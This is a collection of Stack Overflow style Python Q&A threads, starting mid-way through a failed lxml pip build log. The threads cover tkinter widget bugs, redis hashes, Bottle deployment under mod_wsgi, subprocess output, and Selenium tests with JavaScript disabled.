Using build configuration of libxslt 1.1.28 running install running build running build_py creating build creating build/lib.macosx-10.9-intel-2.7 creating build/lib.macosx-10.9-intel-2.7/lxml copying src/lxml/__init__.py -> build/lib.macosx-10.9-intel-2.7/lxml copying src/lxml/_elementpath.py -> build/lib.macosx-10.9-intel-2.7/lxml copying src/lxml/builder.py -> build/lib.macosx-10.9-intel-2.7/lxml copying src/lxml/cssselect.py -> build/lib.macosx-10.9-intel-2.7/lxml copying src/lxml/doctestcompare.py -> build/lib.macosx-10.9-intel-2.7/lxml copying src/lxml/ElementInclude.py -> build/lib.macosx-10.9-intel-2.7/lxml copying src/lxml/pyclasslookup.py -> build/lib.macosx-10.9-intel-2.7/lxml copying src/lxml/sax.py -> build/lib.macosx-10.9-intel-2.7/lxml copying src/lxml/usedoctest.py -> build/lib.macosx-10.9-intel-2.7/lxml creating build/lib.macosx-10.9-intel-2.7/lxml/includes copying src/lxml/includes/__init__.py -> build/lib.macosx-10.9-intel-2.7/lxml/includes creating build/lib.macosx-10.9-intel-2.7/lxml/html copying src/lxml/html/__init__.py -> build/lib.macosx-10.9-intel-2.7/lxml/html copying src/lxml/html/_diffcommand.py -> build/lib.macosx-10.9-intel-2.7/lxml/html copying src/lxml/html/_html5builder.py -> build/lib.macosx-10.9-intel-2.7/lxml/html copying src/lxml/html/_setmixin.py -> build/lib.macosx-10.9-intel-2.7/lxml/html copying src/lxml/html/builder.py -> build/lib.macosx-10.9-intel-2.7/lxml/html copying src/lxml/html/clean.py -> build/lib.macosx-10.9-intel-2.7/lxml/html copying src/lxml/html/defs.py -> build/lib.macosx-10.9-intel-2.7/lxml/html copying src/lxml/html/diff.py -> build/lib.macosx-10.9-intel-2.7/lxml/html copying src/lxml/html/ElementSoup.py -> build/lib.macosx-10.9-intel-2.7/lxml/html copying src/lxml/html/formfill.py -> build/lib.macosx-10.9-intel-2.7/lxml/html copying src/lxml/html/html5parser.py -> build/lib.macosx-10.9-intel-2.7/lxml/html copying src/lxml/html/soupparser.py -> build/lib.macosx-10.9-intel-2.7/lxml/html copying src/lxml/html/usedoctest.py -> build/lib.macosx-10.9-intel-2.7/lxml/html creating build/lib.macosx-10.9-intel-2.7/lxml/isoschematron copying src/lxml/isoschematron/__init__.py -> build/lib.macosx-10.9-intel-2.7/lxml/isoschematron copying src/lxml/lxml.etree.h -> build/lib.macosx-10.9-intel-2.7/lxml copying src/lxml/lxml.etree_api.h -> build/lib.macosx-10.9-intel-2.7/lxml copying src/lxml/includes/c14n.pxd -> build/lib.macosx-10.9-intel-2.7/lxml/includes copying src/lxml/includes/config.pxd -> build/lib.macosx-10.9-intel-2.7/lxml/includes copying src/lxml/includes/dtdvalid.pxd -> build/lib.macosx-10.9-intel-2.7/lxml/includes copying src/lxml/includes/etreepublic.pxd -> build/lib.macosx-10.9-intel-2.7/lxml/includes copying src/lxml/includes/htmlparser.pxd -> build/lib.macosx-10.9-intel-2.7/lxml/includes copying src/lxml/includes/relaxng.pxd -> build/lib.macosx-10.9-intel-2.7/lxml/includes copying src/lxml/includes/schematron.pxd -> build/lib.macosx-10.9-intel-2.7/lxml/includes copying src/lxml/includes/tree.pxd -> build/lib.macosx-10.9-intel-2.7/lxml/includes copying src/lxml/includes/uri.pxd -> build/lib.macosx-10.9-intel-2.7/lxml/includes copying src/lxml/includes/xinclude.pxd -> build/lib.macosx-10.9-intel-2.7/lxml/includes copying src/lxml/includes/xmlerror.pxd -> build/lib.macosx-10.9-intel-2.7/lxml/includes copying src/lxml/includes/xmlparser.pxd -> build/lib.macosx-10.9-intel-2.7/lxml/includes copying src/lxml/includes/xmlschema.pxd -> build/lib.macosx-10.9-intel-2.7/lxml/includes copying src/lxml/includes/xpath.pxd -> 
build/lib.macosx-10.9-intel-2.7/lxml/includes copying src/lxml/includes/xslt.pxd -> build/lib.macosx-10.9-intel-2.7/lxml/includes copying src/lxml/includes/etree_defs.h -> build/lib.macosx-10.9-intel-2.7/lxml/includes copying src/lxml/includes/lxml-version.h -> build/lib.macosx-10.9-intel-2.7/lxml/includes creating build/lib.macosx-10.9-intel-2.7/lxml/isoschematron/resources creating build/lib.macosx-10.9-intel-2.7/lxml/isoschematron/resources/rng copying src/lxml/isoschematron/resources/rng/iso-schematron.rng -> build/lib.macosx-10.9-intel-2.7/lxml/isoschematron/resources/rng creating build/lib.macosx-10.9-intel-2.7/lxml/isoschematron/resources/xsl copying src/lxml/isoschematron/resources/xsl/RNG2Schtrn.xsl -> build/lib.macosx-10.9-intel-2.7/lxml/isoschematron/resources/xsl copying src/lxml/isoschematron/resources/xsl/XSD2Schtrn.xsl -> build/lib.macosx-10.9-intel-2.7/lxml/isoschematron/resources/xsl creating build/lib.macosx-10.9-intel-2.7/lxml/isoschematron/resources/xsl/iso-schematron-xslt1 copying src/lxml/isoschematron/resources/xsl/iso-schematron-xslt1/iso_abstract_expand.xsl -> build/lib.macosx-10.9-intel-2.7/lxml/isoschematron/resources/xsl/iso-schematron-xslt1 copying src/lxml/isoschematron/resources/xsl/iso-schematron-xslt1/iso_dsdl_include.xsl -> build/lib.macosx-10.9-intel-2.7/lxml/isoschematron/resources/xsl/iso-schematron-xslt1 copying src/lxml/isoschematron/resources/xsl/iso-schematron-xslt1/iso_schematron_message.xsl -> build/lib.macosx-10.9-intel-2.7/lxml/isoschematron/resources/xsl/iso-schematron-xslt1 copying src/lxml/isoschematron/resources/xsl/iso-schematron-xslt1/iso_schematron_skeleton_for_xslt1.xsl -> build/lib.macosx-10.9-intel-2.7/lxml/isoschematron/resources/xsl/iso-schematron-xslt1 copying src/lxml/isoschematron/resources/xsl/iso-schematron-xslt1/iso_svrl_for_xslt1.xsl -> build/lib.macosx-10.9-intel-2.7/lxml/isoschematron/resources/xsl/iso-schematron-xslt1 copying src/lxml/isoschematron/resources/xsl/iso-schematron-xslt1/readme.txt -> build/lib.macosx-10.9-intel-2.7/lxml/isoschematron/resources/xsl/iso-schematron-xslt1 running build_ext building 'lxml.etree' extension creating build/temp.macosx-10.9-intel-2.7 creating build/temp.macosx-10.9-intel-2.7/src creating build/temp.macosx-10.9-intel-2.7/src/lxml cc -fno-strict-aliasing -fno-common -dynamic -arch x86_64 -arch i386 -g -Os -pipe -fno-common -fno-strict-aliasing -fwrapv -DENABLE_DTRACE -DMACOSX -DNDEBUG -Wall -Wstrict-prototypes -Wshorten-64-to-32 -DNDEBUG -g -fwrapv -Os -Wall -Wstrict-prototypes -DENABLE_DTRACE -arch x86_64 -arch i386 -pipe -I/usr/include/libxml2 -I/private/var/folders/kn/mmhj7w0n54s4b2jr08sx46kr0000gn/T/pip_build_youweizhu/lxml/src/lxml/includes -I/System/Library/Frameworks/Python.framework/Versions/2.7/include/python2.7 -c src/lxml/lxml.etree.c -o build/temp.macosx-10.9-intel-2.7/src/lxml/lxml.etree.o -w -flat_namespace In file included from src/lxml/lxml.etree.c:239: /private/var/folders/kn/mmhj7w0n54s4b2jr08sx46kr0000gn/T/pip_build_youweizhu/lxml/src/lxml/includes/etree_defs.h:14:10: fatal error: 'libxml/xmlversion.h' file not found #include "libxml/xmlversion.h" ^ 1 error generated. error: command 'cc' failed with exit status 1 ---------------------------------------- Cleaning up... 
Command /usr/bin/python -c "import setuptools, tokenize;__file__='/private/var/folders/kn/mmhj7w0n54s4b2jr08sx46kr0000gn/T/pip_build_youweizhu/lxml/setup.py';exec(compile(getattr(tokenize, 'open', open)(__file__).read().replace('\r\n', '\n'), __file__, 'exec'))" install --record /var/folders/kn/mmhj7w0n54s4b2jr08sx46kr0000gn/T/pip-0wnEw6-record/install-record.txt --single-version-externally-managed --compile failed with error code 1 in /private/var/folders/kn/mmhj7w0n54s4b2jr08sx46kr0000gn/T/pip_build_youweizhu/lxml Storing debug log for failure in /Users/youweizhu/Library/Logs/pip.log I'm crying... Answer: Andre Augusto pointed out > If you want to use lxml together with the official libxml2 Python bindings > (maybe because one of your dependencies uses it), you must build lxml > statically. Otherwise, the two packages will interfere in places where the > libxml2 library requires global configuration, which can have any kind of > effect from disappearing functionality to crashes in either of the two. > > To get a static build, either pass the --static-deps option to the setup.py > script, or run pip with the STATIC_DEPS or STATICBUILD environment variable > set to true, i.e. > > STATIC_DEPS=true pip install lxml > > The STATICBUILD environment variable is handled equivalently to the > STATIC_DEPS variable, but is used by some other extension packages, too. from the lxml docs here.. <http://lxml.de/installation.html#using-lxml-with- python-libxml2> his original post is here: [Cannot install Lxml on Mac os x 10.9](http://stackoverflow.com/questions/19548011/cannot-install-lxml-on-mac- os-x-10-9) There's some other ios related fixes there as well.
How to pass a class/module definition into another file Question: I'm a beginner in OOP Python and I just wanna know this: This is **file.py** : class Card(): def __init__(self, rank, suit): """Initialization method""" self.rank = rank self.suit = suit def get_rank(self): """Function get_rank returns a rank (value) of the card""" return self.rank When I wanna create and pass an object to the function "get_rank" in this file, I can do this: card1 = Card(10,"Diamond") card1.get_rank() But how can I create and pass an object in another file? There is another file called **test_file.py** , it's a testing file (py.test). So **file.py** is for code only, **test_file.py** represents parameters (variables and objects) which are passed to **file.py**. In **test_file.py** is also variable "expected_result" with a correct result. Then when I use "py.test" (bash), it shows me, if the result is correct or not. I understand this non-OOP example: **abs.py** : `def split_text(text): - code -` **test_abs.py** : def test(): text = 'abcdefgh' Please help, thanks for any advice :) Answer: In your `test_file.py`: from file import Card ... card1 = Card(10, "Diamond") # Do something with it By the way, do not name your file file.py: `file` is a built-in function.
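Since the question mentions py.test, here is a minimal sketch of what `test_file.py` might look like; the expected value and the call to `get_rank()` are assumptions based on the description:

    # test_file.py
    from file import Card   # better: rename file.py to e.g. card.py and import from there

    def test_get_rank():
        card1 = Card(10, "Diamond")
        expected_result = 10
        assert card1.get_rank() == expected_result

Running `py.test` in that directory picks up any `test_*` function in `test_*.py` files and reports whether the assertion holds.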
Python: Remove text between <Table></Table> from text Question: I am still relatively new to the use of `regex` in Python and I am struggling to find a way to remove the content between the tags in a very simple .txt file. See this [file](https://www.dropbox.com/s/tnpm55xe1ovh7ow/0001047469-98-044981.txt?dl=0) for example. Here's what I've tried: fdir = open("C:\\file.txt") line = fdir.read() line = line.lower() pattern = re.compile("(?is)<table[^>]*>(.*?)<\/table>", re.MULTILINE) line = pattern.sub('', line) and fdir = open("C:\\file.txt") line = fdir.read() line = re.sub(r"(?is)<table[^>]*>(.*?)<\/table>", '', line, re.DOTALL) Both codes simply remove the tags `<Table>` and `<\Table>` in my text file and not what is in between. What's missing in my code? **I want the tags to be deleted as well.** Answer: You should consider using [BeautifulSoup](http://www.crummy.com/software/BeautifulSoup/bs4/doc/) to remove these tags ... >>> from bs4 import BeautifulSoup >>> soup = BeautifulSoup(html) >>> for t in soup.find_all('table'): ... t.decompose()
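A slightly fuller sketch of that approach applied to the file from the question; the default parser and the use of `str(soup)` to keep the remaining markup are assumptions, and `soup.get_text()` can be used instead if only the plain text is wanted:

    from bs4 import BeautifulSoup

    with open("C:\\file.txt") as fh:
        soup = BeautifulSoup(fh.read())

    for t in soup.find_all('table'):
        t.decompose()          # removes each <table> tag and everything inside it

    cleaned = str(soup)        # or soup.get_text() for text only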
Python TypeError: coercing to Unicode: need string or buffer, file found Question: I am into learning Python, with a C- language background. Sorry, if my problem is 'naive' or 'too simple' or 'didn't worked enough'. In the below code, I want to practice for future problems, the removal of specific rows by the 'set' data-structure. But, first of all: it fails to match the removal set contents. Also, the second issue: is the error in o/p. This can be checked by making the indented block work instead. The trimmed data file is : **marks_trim.csv** > "Anaconda Systems Campus Placement",,,,,, > > "Conducted on:",,,"30 Feb 2011",,, > > "Sno","Math","CS","GK","Prog","Comm","Sel" > > 1,"NA","NA","NA",4,0,0 * * * import csv, sys, re, random, os, time, io, StringIO datfile = sys.argv[1] outfileName = sys.argv[2] outfile = open(outfileName, "w") count = 0 removal_list = set() tmp = list() i=0 re_pattern = "\d+" with open(datfile, 'r') as fp: reader1 = csv.reader(fp) for row in reader1: if re.match(re_pattern, row[0]): for cols in row: removal_list.add(tuple(cols)) #as tuple is hashable print "::row>>>>>>",row print "::removal_list>>>>>>>>",removal_list convert = list(removal_list) print "<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>" print convert f = open(datfile, 'r') reader2 = csv.reader(f) print "" print "Removal List Starts" print removal_list print "Removal List Ends\n" new_a_buf = io.BytesIO() # StringIO.StringIO() : both 'io' & StringIO' work writer = csv.writer(new_a_buf) rr ="" j = 0 for row in reader2: if row not in convert: # removal_list: not used as list not hashable writer.writerow(row) #outfile.write(new_a_buf) ''' #below code using char array isn't used as it doesn't copy structure of csv file for cols in row: #at indentation level of "if row not in convert", stated above if cols not in convert: # removal_list: not used as list not hashable for j in range(0,len(cols)): rr+=cols[j] #at indentation level of "if cols not in convert:" outfile.write(rr) # at the indentation level of 'if' print "<<<<<<<<<<<<<<<<", rr f = open(outfile, 'r') reader2 = csv.reader(f) ''' new_a_buf.seek(0) reader2 = csv.reader(new_a_buf) for row in reader2: print row * * * **Problem/Issue** : The common error (i.e. using char array / csv.writer object) in the o/p is also giving the rows to be deleted, i.e. by occurrence in `removal_list`. However, in the approach using char array for retrieving left-out rows, the error is : > Traceback (most recent call last): > > File "test_list_in_set.py", line 51, in > > f = open(outfile, 'r') > > TypeError: coercing to Unicode: need string or buffer, file found Answer: I didn't read through all that code - but it mostly doesn't seem relevant. The error is to do with opening a file: `open` takes a filename, but you are passing it `outfile`, which is already a file. You should close that file first then pass `outfileName` to open.
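In code, the fix described above is just the following (a sketch; whether the file needs to be reopened at all depends on what the rest of the script does with it):

    outfile.close()              # finish and flush what was written
    f = open(outfileName, 'r')   # reopen by name (a string), not by passing the file object
    reader2 = csv.reader(f)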
Python Matplotlib custom style error Question: I'm trying to use a custom matplotlib style, but it does not work. As mentioned here: <http://matplotlib.org/users/style_sheets.html> I tried the following:

    import matplotlib.pyplot as plt
    print plt.style.available

`matplotlib.pyplot` works fine, but it keeps saying that `style` is not defined:

    >>> import matplotlib.pyplot as plt
    >>> print plt.style.available
    Traceback (most recent call last):
      File "<stdin>", line 1, in <module>
    AttributeError: 'module' object has no attribute 'style'

What is the solution? This is on Mac OS X Yosemite, with matplotlib installed as administrator in the default location. Answer: _Styles_ are a very recent feature of `matplotlib`, introduced in version 1.4.

* If your version of matplotlib is up-to-date, then you are suffering from a bug in the installation procedure.
* If your version is older than 1.4, then it is not expected that you have style sheets installed.

To look at your version, do the following (my `matplotlib` is old...)

    >>> import matplotlib
    >>> matplotlib.__version__
    '1.3.1'
    >>>
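A quick way to check and fix this locally (a sketch; it assumes the install can simply be upgraded, e.g. with `pip install --upgrade matplotlib` or the Anaconda equivalent, and that `'ggplot'` is one of the styles shipped with 1.4):

    import matplotlib
    print matplotlib.__version__        # needs to be >= 1.4 for plt.style

    # after upgrading:
    import matplotlib.pyplot as plt
    print plt.style.available
    plt.style.use('ggplot')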
Convert redis hash to python dict? Question: Suppose I have a python dict `aa = {"name": "nilesh", "age":29}`. When I store it in a redis hash, all the datatypes change to strings.

    import redis
    r = redis.StrictRedis()
    r.hmset("nilesh_123", aa)
    bb = r.hgetall("nilesh_123")

Now bb comes back as `{'age': '29', 'name': 'nilesh'}`. Is there any pythonic way to convert this returned hash back to a proper python dict again? One way I see is to store the datatypes of the dictionary values somewhere and convert them again when I get the hash, by iterating over the redis hash values, but I am looking for a better, more pythonic solution. I could store the dict as a pickled object in a redis string and load it again with pickle when I get it back, but I am more interested in using hashes compared to strings. Answer: Redis stores hash fields and values as plain strings, so `hgetall` can only ever give you strings back; the original types are lost when the data goes in. Also note that `{'age': '29', 'name': 'nilesh'}` is a Python dict repr, not JSON (JSON uses double quotes), so a JSON parser will not accept it directly. If you want the types to survive the round trip while still using a hash, serialize each value before storing it, for example with `json.dumps`, and decode each value with `json.loads` when you read it back. That is the same idea as your pickle approach, but applied per field and more portable. For background on JSON-to-dict conversion, see: [Converting JSON into Python dict](http://stackoverflow.com/questions/2485817/converting-json-into-python-dict)
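A minimal sketch of that per-field JSON approach, assuming redis-py's `hmset`/`hgetall` as used in the question (under Python 3 the keys also come back as bytes and would need decoding):

    import json
    import redis

    r = redis.StrictRedis()
    aa = {"name": "nilesh", "age": 29}

    # encode each value so its type survives the round trip
    r.hmset("nilesh_123", dict((k, json.dumps(v)) for k, v in aa.items()))

    raw = r.hgetall("nilesh_123")
    bb = dict((k, json.loads(v)) for k, v in raw.items())
    # numbers come back as ints, text values come back as (unicode) strings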
Error: Attribute error in TCL Question: I am trying to create an application in Python GUI using tkinter. Here is the code I'm using for the GUI part. Whenever I try to access my Entry Widget I get error. Ex:Sin_put.get() should give me the text in the Entry widget but it gives me an error AttributeError: 'NoneType' object has no attribute 'get' I'm relatively new to Python. So if you guys have any suggestions to improve the functionality you're most welcome. from tkinter import * from tkinter import ttk sys.path.insert(0, 'home/ashwin/') import portscanner class App: def __init__(self, master): master.option_add('*tearOff', False) master.resizable(False,False) self.nb = ttk.Notebook(master) self.nb.pack() self.nb.config(width=720,height=480) self.zipframe = ttk.Frame(self.nb) self.scanframe = ttk.Frame(self.nb) self.botframe = ttk.Frame(self.nb) self.mb = Menu(master) master.config(menu = self.mb) file = Menu(self.mb) info = Menu(self.mb) self.mb.add_cascade(menu = file, label = 'Tools') self.mb.add_cascade(menu = info, label = 'Help') file.add_command(label='Zip Cracker', command = self.zipframe_create) file.add_command(label='Port Scanner', command = self.scanframe_create) file.add_command(label='Bot net', command =self.botframe_create) info.add_command(label='Usage', command=(lambda:print('Usage'))) info.add_command(label='About', command=(lambda:print('About'))) def zipframe_create(self): self.nb.add(self.zipframe,text='Zip') self.zipframe.config(height=480,width=720) zlabel1 = ttk.Label(self.zipframe, text='Select the zip file').grid(row=0,column=0, padx=5, pady=10) zlabel2 = ttk.Label(self.zipframe, text='Select the dictionary file').grid(row=2,column=0, padx=5) ztext1 = ttk.Entry(self.zipframe, width = 50).grid(row=0,column=1,padx=5,pady=10) ztext2 = ttk.Entry(self.zipframe, width = 50).grid(row=2,column=1,padx=5) zoutput = Text(self.zipframe, width=80, height=20).grid(row=3,column=0,columnspan = 3,padx=5,pady=10) zb1 = ttk.Button(self.zipframe, text='Crack', width=10).grid(row=0,column=2,padx=5,pady=10) def scanframe_create(self): self.nb.add(self.scanframe,text='Scan') self.scanframe.config(height=480,width=720) slabel1 = ttk.Label(self.scanframe, text='IP address').grid(row=0,column=0, padx=5, pady=10) sin_put = ttk.Entry(self.scanframe, width = 50).grid(row=0,column=1,padx=5,pady=10) soutput = Text(self.scanframe, width=80, height=20).grid(row=3,column=0,columnspan = 3,padx=5,pady=10) sb1 = ttk.Button(self.scanframe, text='Scan', width=6,command= print('Content: {}'.format(sin_put.get()))).grid(row=0,column=2,padx=5,pady=10) def botframe_create(self): self.nb.add(self.botframe,text='Bot') self.botframe.config(height=480,width=720) blabel1 = ttk.Label(self.botframe, text='IP address').grid(row=0,column=0, padx=5, pady=10) blabel2 = ttk.Label(self.botframe, text='Username').grid(row=1,column=0, padx=2) blabel3 = ttk.Label(self.botframe, text='password').grid(row=2,column=0, padx=2) btext1 = ttk.Entry(self.botframe, width = 30).grid(row=0,column=1,padx=5,pady=10) btext2 = ttk.Entry(self.botframe, width = 30).grid(row=1,column=1) btext2 = ttk.Entry(self.botframe, width = 30).grid(row=2,column=1) boutput = Text(self.botframe, width=80, height=20).grid(row=3,column=0,columnspan = 3,padx=5,pady=10) bb1 = ttk.Button(self.botframe, text='Connect', width=8).grid(row=2,column=2,padx=5,pady=10) def main(): root = Tk() feedback = App(root) root.mainloop() if __name__ == "__main__": main() Answer: grid() returns None so sin_put will always equal None. 
Instead of passing the Tkinter ID to grid() you have to store it first if you want to reference it later. Note that for the Buttons, putting it all on one line is fine as you don't use the button's ID later. sin_put=ttk.Entry(self.scanframe, width = 50) ## stores the return ID from Entry sin_put.grid(row=0,column=1,padx=5,pady=10) ## don't catch return from grid as it is None
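Note that the posted code has a second, related problem: `command=print('Content: {}'.format(sin_put.get()))` calls `print` (and `sin_put.get()`) immediately, while the button is being constructed, and assigns its return value (`None`) as the command. Deferring the call with a `lambda`, combined with the separated `grid()` call, would look something like this sketch:

    sin_put = ttk.Entry(self.scanframe, width=50)
    sin_put.grid(row=0, column=1, padx=5, pady=10)

    sb1 = ttk.Button(self.scanframe, text='Scan', width=6,
                     command=lambda: print('Content: {}'.format(sin_put.get())))
    sb1.grid(row=0, column=2, padx=5, pady=10)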
Confused about majorclust algorithm Question: I would like to write my own code in matlab for "majorclust" algorithm. I have document pairs having their cosine similarity. When i search through the web, i encounter this web site. <http://muse-amuse.in/~baali/MajorClustPost.html> In the example(written in Python) in this web site, the clustering part is given as follow: t = False indices = np.arange(num_of_samples) while not t: t = True for index in np.arange(num_of_samples): # aggregating edge weights new_index = np.argmax(np.bincount(indices, weights=cosine_distances[index])) if indices[new_index] != indices[index]: indices[index] = indices[new_index] t = False When i examine the sample, i am a bit confused. When we consider the for loop: for index in np.arange(num_of_samples): the first index will be "0". And maximum similarity is retrieved with "1". So the new_index must be 1 and the index "0" will be replaced by "1". On the next iteration index will be "1" and its maximum weight will come from "0" which has the same index from the previous iteration. As a result, after this point loop must terminate. This algorithm is based on the paper (given on page 4): <http://www.uni-weimar.de/medien/webis/publications/papers/stein_2002c.pdf> On the paper, it is stated that index must be chosen randomly. But in the example i could not see any random choice. What am i missing? Answer: Yes it would be good if you shuffle the indices and you can do the same using from random import shuffle shuffled_indices = np.arange(num_of_samples) shuffle(shuffled_indices) for index in shuffled_indices: # aggregating edge weights new_index = np.argmax(np.bincount(indices,weights=cosine_distances[index])) if indices[new_index] != indices[index]: indices[index] = indices[new_index] t = False Sorry for such a late reply.
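Putting the shuffle together with the convergence loop from the question, the whole clustering step might look like the sketch below; `cosine_distances` is assumed to be the full pairwise similarity matrix, as in the linked post:

    import numpy as np
    from random import shuffle

    indices = np.arange(num_of_samples)
    changed = True
    while changed:
        changed = False
        order = list(range(num_of_samples))
        shuffle(order)            # visit the nodes in a fresh random order on every sweep
        for index in order:
            new_index = np.argmax(np.bincount(indices, weights=cosine_distances[index]))
            if indices[new_index] != indices[index]:
                indices[index] = indices[new_index]
                changed = True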
sorting dictionary values in python - descending alphabetically Question: I have a dictionary:

    higharr = {'Alex':2, 'Steve':3, 'Andy':4, 'Wallace':6, 'Andy':3, 'Andy':5, 'Dan':1, 'Dan':0, 'Steve':3, 'Steve':8}

    for score in sorted(higharr.values(), reverse=True):
        print (score)

I would like to print out the keys together with the values, with the values in descending order. The descending part is working, but I am unsure about how to add the corresponding key to the left of each value. Thank you Answer: You may want to use another data structure, because you have duplicate keys (a dict keeps only one entry per key). But in general you might consider this:

    from operator import itemgetter

    for i in sorted(higharr.items(), key=itemgetter(1), reverse=True):
        print i
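As a sketch of that "use another data structure" suggestion: a dict literal silently keeps only the last value for each duplicate key, so if every score should survive, store (name, score) pairs in a list instead and sort that:

    scores = [('Alex', 2), ('Steve', 3), ('Andy', 4), ('Wallace', 6), ('Andy', 3),
              ('Andy', 5), ('Dan', 1), ('Dan', 0), ('Steve', 3), ('Steve', 8)]

    for name, score in sorted(scores, key=lambda pair: pair[1], reverse=True):
        print name, score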
How I can run /myapp/my_app.py by default when accessing `localhost` using Bottle? Question: **Desired Behaviour** I want to serve content created by the file at: /myapp/my_app.py when accessing `localhost`. **Question** I know that if I add the following to `test.py` and run the file directly, the results will be accessible at `localhost:8080`: from bottle import route, run @route('/') def hello(): return "Hello World!" run(host='localhost', port=8080, debug=True) But how do I trigger this file to run by default when accessing `localhost`? **Environment** * Linux Mint 17 * MongoDB * RockMongo (Apache2, PHP, MongoDB Driver) **What I've Tried** I installed `mod_wsgi` and created `/var/www/html/myapp/app.wsgi` with this content: import bottle import os os.chdir(os.path.dirname(__file__)) @route('/') def hello(): return "Hello World!" application = bottle.default_app() And then restarted Apache. But going to `localhost` just shows a file directory. I then created `/etc/apache2/sites-enabled/mygreatapp.conf` with this content: <VirtualHost *> ServerName google.com WSGIScriptAlias / /var/www/html/myapp/app.wsgi <Directory /var/www/html/myapp> WSGIProcessGroup yourapp WSGIApplicationGroup %{GLOBAL} Order deny,allow Allow from all </Directory> </VirtualHost> But I still just see a file directory. **Official Instructions** <http://bottlepy.org/docs/dev/deployment.html#apache-mod-wsgi> **Further Information** **Troubleshooting** _See if mod_wsgi is loaded_ apache2ctl -M ... wsgi_module (shared) **Definitions** For my own reference, I'm trying to fully comprehend several elements that I think are involved in the process, feel free to correct if my understandings are wrong: **WSGI** \- A convention for how applications should communicate with servers. > It does not exist anywhere else other than as words in the [PEP > 3333](http://www.python.org/dev/peps/pep-3333/) \- > [Source](http://webpython.codepoint.net/wsgi_tutorial) **mod_wsgi** \- An Apache module that allows Python files to communicate with Apache. **Web Framework** \- See a list of them here: <https://wiki.python.org/moin/WebFrameworks> **Web Server** \- <http://en.wikipedia.org/wiki/Web_server> **Apache Server** \- <http://en.wikipedia.org/wiki/Apache_HTTP_Server> Answer: I finally have "Hello World!" displaying in the browser at `localhost`. I will paste the various required configs and files below. I'm a newb so I don't know if this is definitive or best practise. **/var/www/html/myapp/app.wsgi** # view the effect of import method: http://stackoverflow.com/a/2452639/1063287 import bottle import os os.chdir(os.path.dirname(__file__)) # note i am using bottle.route and not just route @bottle.route('/') def hello(): return "Hello World!" application = bottle.default_app() **/etc/apache2/sites-available/000-default.conf** (note: this is the default `.conf` file) <VirtualHost *:80> ServerAdmin webmaster@localhost DocumentRoot /var/www/html WSGIScriptAlias / /var/www/html/myapp/app.wsgi # just added this ErrorLog ${APACHE_LOG_DIR}/error.log CustomLog ${APACHE_LOG_DIR}/access.log combined </VirtualHost> Viewing the Apache error log is what eventually led me to try a few different things: sudo tail -100 /var/log/apache2/error.log Where I saw things like: Exception occurred processing WSGI script '/var/www/html/myapp/app.wsgi'. 
Traceback (most recent call last): File "/var/www/html/myapp/app.wsgi", line 8, in <module> @route('/') NameError: name 'route' is not defined This was only after I had made the step of not using a new `.conf` file and just modifying the default one. So for some reason it didn't like any new `.conf` files.
Getting output from a Python script subprocess Question: This may be a stupid question but I have a Python script that starts a subprocess (also a Python script) and I need that subprocess to return three integers. How do I get those return values from the Python script that starts the subprocess? Do I have to output the integers to stdout and then use the check_output() function? Answer: The answer is _Yes_... I want my +15 reputation!! **:-D**

No, seriously... Once you start dealing with subprocesses, the only way you really have to communicate with them is through files (which is what `stdout`, `stderr` and such are, in the end). So what you're gonna have to do is grab the output and check what happened (and maybe the spawned process' exit code, which will be zero if everything goes well).

Bear in mind that the contents of `stdout` (which is what you'll get with the `check_output` function) is a string. So in order to get the three items, you'll have to split that string somehow... For instance:

    import subprocess

    output = subprocess.check_output(["echo", "1", "2", "3"])
    print "Output: %s" % output
    int1, int2, int3 = [int(x) for x in output.split()]
    print "%s, %s, %s" % (int1, int2, int3)
Selenium WebDriver tests with JavaScript disabled Question: One of our internal applications (written in _angularjs_) has a special error box appearing if javascript is disabled in the browser (using [`noscript`](https://developer.mozilla.org/en- US/docs/Web/HTML/Element/noscript?redirectlocale=en- US&redirectslug=HTML%2FElement%2Fnoscript)), similar to the one on stackoverflow: ![enter image description here](http://i.stack.imgur.com/QZaVk.png) I'm trying to write an automated test for it, but having difficulties. We are using `protractor`, but I'm pretty sure this is not about it. Here is the protractor configuration file: 'use strict'; var helper = require('./helper.js'); exports.config = { seleniumAddress: 'http://localhost:4444/wd/hub', baseUrl: 'http://localhost:9001', capabilities: helper.getFirefoxProfile(), framework: 'jasmine', allScriptsTimeout: 20000, jasmineNodeOpts: { showColors: true, isVerbose: true, includeStackTrace: true } }; where `helper.js` is: var q = require('q'); var FirefoxProfile = require('firefox-profile'); exports.getFirefoxProfile = function() { var deferred = q.defer(); var firefoxProfile = new FirefoxProfile(); firefoxProfile.setPreference("javascript.enabled", false); firefoxProfile.encoded(function(encodedProfile) { var capabilities = { 'browserName': 'firefox', 'firefox_profile' : encodedProfile, 'specs': [ '*.spec.js' ] }; deferred.resolve(capabilities); }); return deferred.promise; }; As you see, we are setting `javascript.enabled` firefox preference to `false` which has been proven to work if you manually open up `about:config` in firefox, change it to `false` \- you would see the contents of `noscript` section. But, when I run the tests, I am getting the following error: > Exception thrown org.openqa.selenium.WebDriverException: waiting for > evaluate.js load failed Here is the [complete traceback](https://gist.github.com/alecxe/8247dd77d55ea34c8916). FYI, selenium `2.44.0` and firefox `33.1.1` are used. As far as I understand (with the help of several points raised [here](http://yizeng.me/2014/01/08/disable-javascript-using-selenium- webdriver/)), **disabling javascript is killing the javascript webdriver itself**. Is it true? If yes, what are my options or workarounds? * * * Notes: * in case of chrome, in the past it was possible to disable javascript via [`--disable-javascript` command-line argument](http://peter.sh/experiments/chromium-command-line-switches/#disable-javascript), but [not](https://code.google.com/p/selenium/issues/detail?id=3175) [anymore.](https://code.google.com/p/selenium/issues/detail?id=6672) * this leads to a workaround number 0 - downgrade chrome to an old version which supported the command-line flag - this would be a not-tested plan B * setting `javascript.enabled=false` firefox preference works with _python selenium bindings_ : from selenium import webdriver profile = webdriver.FirefoxProfile() profile.set_preference('javascript.enabled', False) driver = webdriver.Firefox(firefox_profile=profile) driver.get('https://my_internal_url.com') # no errors and I can assert the error is present I'm open to any suggestions and can provide you with any additional information. Answer: > As far as I understand (with the help of several points raised here), > disabling javascript is killing the javascript webdriver itself. Is it true? Yes. Note that WebDriver itself runs as a Firefox extension, so its code isn't affected by you disabling JavaScript. 
